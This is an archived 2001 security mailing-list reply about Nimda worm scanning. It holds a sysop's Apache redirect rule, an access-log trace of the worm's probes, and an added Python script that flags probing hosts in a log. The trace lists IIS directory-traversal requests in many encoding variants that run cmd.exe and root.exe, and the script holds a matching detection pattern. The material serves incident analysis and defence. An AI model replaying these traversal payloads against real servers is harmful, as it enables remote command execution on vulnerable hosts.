Re: Tracking down the still infected hosts

From: Neil Dickey (neilat_private)
Date: Tue Sep 25 2001 - 11:58:29 PDT


    Tina Bird <tbird@precision-guesswork.com> wrote:
    
    >Can I ask a question?
    >
    >According to Ryan Russell (who's been analyzing the
    >worm code), Nimda doesn't honor redirects - it just
    >checks the response it gets from a Web server to 
    >determine whether or not the server is vulnerable.
    >It doesn't follow redirects.  So what does this 
    >actually accomplish?
    
    In my experience this is correct.  I implemented the
    redirect this morning ( 09:00 ), and just got an
    extended scan ( 162 hits ) from a source which
    appeared to be completely unaffected by the new
    setting.
    
    Evidence provided below.
    
    Best regards,
    
    Neil Dickey, Ph.D.
    Research Associate/Sysop
    Geology Department
    Northern Illinois University
    DeKalb, Illinois
    60115
    
    ------------------------------------------------------------------
    
    Here's the line in the configuration file ...
    
    RedirectMatch (.*)\cmd.exe$ http://127.0.0.1
    
    ... and here's the log trace:
    
    hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
    hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
    hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
    hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
    hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
    hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
    hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
    hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
    hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
    hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
    hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
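The log trace above is what a defender has to work with: the worm ignores the 302 and keeps probing, so the useful job is to pull the probing hosts out of the access log and show whether the redirect changed their behaviour at all. The script below is an added example written for this archive page, not code from Neil Dickey's post or from any tool mentioned in the thread. It parses Apache common-log lines, flags requests for the root.exe and cmd.exe targets seen in the trace (whatever traversal encoding precedes them), and reports per source host how many probes arrived, which status codes the server returned, and whether probing continued after that host had already received a 302. The SAMPLE_LOG is constructed: it reuses a few lines in the shape of the trace above plus two ordinary requests from 192.0.2.10, a documentation address, so the script runs offline.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample: a handful of lines in the shape of the trace above,
# plus two benign requests from a documentation address (192.0.2.10).
SAMPLE_LOG = """\
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
192.0.2.10 - - [25/Sep/2001:13:20:02 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [25/Sep/2001:13:20:03 -0500] "GET /images/logo.gif HTTP/1.0" 200 2210
"""

# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Every probe in the trace ends in root.exe or cmd.exe; the traversal prefix
# varies (%255c, %c0%af, %%35%63, ...) so we key on the file name, not the prefix.
PROBE_RE = re.compile(r'(root|cmd)\.exe', re.IGNORECASE)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_probe(path):
    """True if the request path targets one of the worm's two probe executables."""
    return PROBE_RE.search(path) is not None


def summarize(log_text):
    """Per probing host: probe count, status-code histogram, first/last probe time,
    and whether probes kept arriving after the host had already been sent a 302."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec["path"]):
            per_host[rec["host"]].append(rec)

    report = {}
    for host, recs in per_host.items():
        recs.sort(key=lambda r: r["time"])
        first_302 = next((r["time"] for r in recs if r["status"] == 302), None)
        # Strictly later than the first 302; probes in the same second are not counted.
        kept_going = first_302 is not None and any(r["time"] > first_302 for r in recs)
        report[host] = {
            "probes": len(recs),
            "statuses": Counter(r["status"] for r in recs),
            "first": recs[0]["time"].isoformat(),
            "last": recs[-1]["time"].isoformat(),
            "kept_scanning_after_302": kept_going,
        }
    return report


if __name__ == "__main__":
    for host, s in summarize(SAMPLE_LOG).items():
        verdict = "kept scanning after 302" if s["kept_scanning_after_302"] else "no probes after 302"
        print(f"{host}: {s['probes']} probes {dict(s['statuses'])} {s['first']}..{s['last']} ({verdict})")
```

Run it against a real access_log by reading the file into `summarize()` instead of SAMPLE_LOG; hosts with `kept_scanning_after_302` set are the ones the redirect did nothing for, which is exactly what the trace above shows for hs090.fau.edu. Matching on the file name rather than trying to decode each traversal variant is deliberate: several of the encodings in the trace (%c0%af, %c1%9c) are not valid UTF-8 and do not survive a naive percent-decode, but cmd.exe appears literally in every one of them.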
    



    This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 13:16:38 PDT